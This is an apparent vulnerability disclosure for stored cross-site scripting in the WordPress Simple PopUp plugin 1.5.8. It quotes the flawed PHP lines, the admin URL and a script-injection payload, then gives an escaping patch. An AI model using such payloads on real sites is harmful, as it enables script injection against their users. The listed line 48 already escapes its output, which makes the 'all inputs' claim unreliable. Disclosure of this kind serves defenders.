###################### # Exploit Title : Wordpress Simple PopUp Plugin Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://wordpress.org/plugins/simple-popup/ # Date: 2015-08-18 # Tested On : Windows - Firefox # Software Link : https://downloads.wordpress.org/plugin/simple-popup.zip # Version : 1.5.8 ###################### # Vulnerable File : sp-options.php (WordPress SimplePop Options) ###################### # Vulnerable Codes : 19: register_setting( 'sp-settings-group', 'popup_box_delay' ); 22: register_setting( 'sp-settings-group', 'popup_box_rounded_corner'); 48: <input type="text" name="popup_box_delay" value="<?php echo htmlspecialchars(get_option('popup_box_delay')); ?>" /> 72: <input type="text" name="popup_box_rounded_corner" value="<?php echo get_option('popup_box_rounded_corner'); ?>" /> ###################### # Exploit : For test Cross site scripting can use this code in all of the above inputs. Address WordPress SimplePop Options : http://localhost/wordpress/wp-admin/admin.php?page=simple-popup%2Fsp-options.php "><script>alert(/xss/)</script> ###################### # Patch: To fix this vulnerability you use htmlspecialchars() function . 48: <input type="text" name="popup_box_delay" value="<?php echo htmlspecialchars(get_option('popup_box_delay')); ?>" /> 72: <input type="text" name="popup_box_rounded_corner" value="<?php echo htmlspecialchars(get_option('popup_box_rounded_corner')); ?>" /> ###################### # Discovered By : Ehsan Hosseini. ######################